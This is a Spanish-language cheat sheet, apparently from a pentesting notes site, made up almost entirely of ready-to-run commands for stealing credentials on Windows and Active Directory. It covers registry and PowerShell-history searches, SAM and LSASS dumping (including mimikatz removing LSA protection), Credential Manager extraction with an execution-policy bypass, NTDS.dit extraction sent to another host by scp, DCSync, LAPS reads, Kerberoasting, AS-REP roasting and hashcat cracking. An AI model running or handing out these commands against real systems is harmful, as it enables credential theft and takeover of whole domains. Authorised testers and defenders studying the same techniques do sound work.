🔑Recolección de Credenciales

Diferentes técnicas con las que obtener credenciales en una red Windows

Archivos en Texto Plano

Comprobar el historial de comandos de PowerShell

type %APPDATA%\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt

Buscar por Palabra Clave en el Registro de Windows

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Extraer Credenciales del SAM

Técnicas para obtener credenciales de cuentas de usuario local

Metasploit Hashdump

En el caso de tener una meterpreter en la máquina comprometida

meterpreter > hashdump

Volume Shadow Copy Service

Copia del disco con wmic

wmic shadowcopy call create Volume='C:\\'

Verificar copia existosa

vssadmin list shadows

Copiar SAM y SYSTEM desde la copia del volumen

copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\windows\\system32\\config\\sam C:\\users\\Administrator\\Desktop\\sam
copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\windows\\system32\\config\\system C:\\users\\Administrator\\Desktop\\system

Hash dump con secredump.py en máquina local

python3 /opt/impacket/examples/secretsdump.py -sam <sam> -system <system> LOCAL

Registry Hives

Guardar copia de SAM y SYSTEM desde el Registro de Windows

reg save HKLM\\sam C:\\users\\Administrator\\Desktop\\sam-reg
reg save HKLM\\system C:\\users\\Administrator\\Desktop\\system-reg

Hash dump con secredump.py en máquina local

python3.9 /opt/impacket/examples/secretsdump.py -sam /tmp/sam-reg -system /tmp/system-reg LOCAL

Extraer Credenciales del LSASS

Técnicas para volcar las credenciales del sistema mediante el proceso lsass.exe

Sysinternals Suite

Volcar proceso lsass

procdump.exe -accepteula -ma lsass.exe <dir-location>

Protected LSASS

Desactivar protección LSA con mimikatz

mimikatz.exe
sekurlsa::logonpasswords
# ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) - (Protección LSA)
!+
!processprotect /process:lsass.exe /remove
privilege::debug
sekurlsa::logonpasswords

Extraer credenciales desde la memoria

mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

Windows Credential Manager

Técnicas para volcar las credenciales almacenadas del sistema

Acceder al WCM

Enumerar credenciales almacenadas

vaultcmd /list

Comprobar si hay contraseñas en caja específica

vaultcmd /listproperties:"<vault-name>"

Enumerar detalles de credenciales en caja específica

vaultcmd /listcreds:"<vault-name>"

Volcar Credenciales Web con PowerShell

Ejecutar PowerShell con policy bypass

powershell -ex bypass

Importar módulo

Import-Module Get-WebCredentials.ps1

Volcar credenciales web almacenadas

Get-WebCredentials

RunAs

Enumerar credenciales almacenadas

cmdkey /list

Ejecutar consola de comandos utilizando credenciales almacenadas

runas /savecreds /user:<username> cmd.exe

Mimikatz

Volcar credenciales almacenadas desde la memoria

mimikatz.exe
privilege::debug
sekurlsa::credman

Hashes del Domain Controller

Técnicas para volcar los hashes del Domain Controller de manera local y remota.

Volcado Local (Sin Credenciales)

En caso de no tener credenciales válidas pero sí acceso administrativo al DC.

Archivos necesarios:
- C:\Windows\NTDS\ntds.dit
- C:\Windows\System32\config\SYSTEM
- C:\Windows\System32\config\SECURITY

Volcar la db NTDS con ntdsutil en PowerShell

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\\temp' q q"

Transferir todo a máquina local

scp -r * <username>@<ip-a>:/tmp/.

Hash dump con secretsdump.py

python3.9 /opt/impacket/examples/secretsdump.py -security <SECURITY> -system <SYSTEM> -ntds <ntds.dit> local

Volcado Remoto (Con Credenciales)

Técnica para volcar los hashes del sistema y del DC de manera remota con credenciales válidas

Ataque DC Sync

Permisos Necesarios:
- Replicating Directory Changes
- Replicating Directory Changes All
- Replicating Directory Changes in Filtered Set

Ataque DC Sync con secretsdump.py

python3.9 /opt/impacket/examples/secretsdump.py -just-dc/-just-dc-ntlm <domain>/<AD_Admin_User>@<ip>

Hash cracking

hashcat -m 1000 -a 0 <ntlm-hash> <wordlist>

Extraer Credenciales del LAPS

Técnica para enumerar y obtener credenciales de un administrador local de un entorno AD si está configurada y habilitada la función LAPS.

Enumerar función LAPS

Comprobar instalación del LAPS

dir "C:\\Program Files\\LAPS\\CSE"
# Look for AdmPwd.dll

Comprobar cmdlets disponibles

Get-Command *AdmPwd*

Enumerar grupo con permisos de acceso al LAPS

Find-AdmPwdExtendedRights -Identity *
Find-AdmPwdExtendedRights -Identity <OU>

Enumerar usuarios miembros de grupo objetivo

net groups "<group>"

Cambiar a usuario objetivo (Necesita credenciales)

runas /user:<username> cmd.exe

Obtener Credenciales

Extracción de credenciales del Local Admin

Get-AdmPwdPassword -ComputerName <computer-name>

Otros Ataques

Ataques extra sobre un entorno AD para obtener credenciales

Kerberoasting

Enumeración

Enumerar cuentas con acceso al SPN

python3 /opt/impacket/examples/GetUserSPNs.py -dc-ip <ip> <domain-name>/<username>:<pass>

Solicitar un ticket Kerberos

python3 /opt/impacket/examples/GetUserSPNs.py -dc-ip <ip> <domain-name>/<username>:<pass> -request-user <SPN-username>

Explotación

Hash cracking

hashcat -a 0 -m 13100 <hash> /usr/share/wordlist/rockyou.txt

AS-REP Roasting

Necesita enumeración previa de usuarios válidos

Ataque AS-REP Roasting con impacket

python3.9 /opt/impacket/examples/GetNPUsers.py -dc-ip <ip> <domain-name>/ -usersfile users.txt

Última actualización hace 6 meses

hashtagArchivos en Texto Plano

hashtagExtraer Credenciales del SAM

hashtagMetasploit Hashdump

hashtagVolume Shadow Copy Service

hashtagRegistry Hives

hashtagExtraer Credenciales del LSASS

hashtagSysinternals Suite

hashtagProtected LSASS

hashtagWindows Credential Manager

hashtagAcceder al WCM

hashtagVolcar Credenciales Web con PowerShell

hashtagRunAs

hashtagMimikatz

hashtagHashes del Domain Controller

hashtagVolcado Local (Sin Credenciales)

hashtagVolcado Remoto (Con Credenciales)

hashtagAtaque DC Sync

hashtagExtraer Credenciales del LAPS

hashtagEnumerar función LAPS

hashtagObtener Credenciales

hashtagOtros Ataques

hashtagKerberoasting

hashtagEnumeración

hashtagExplotación

hashtagAS-REP Roasting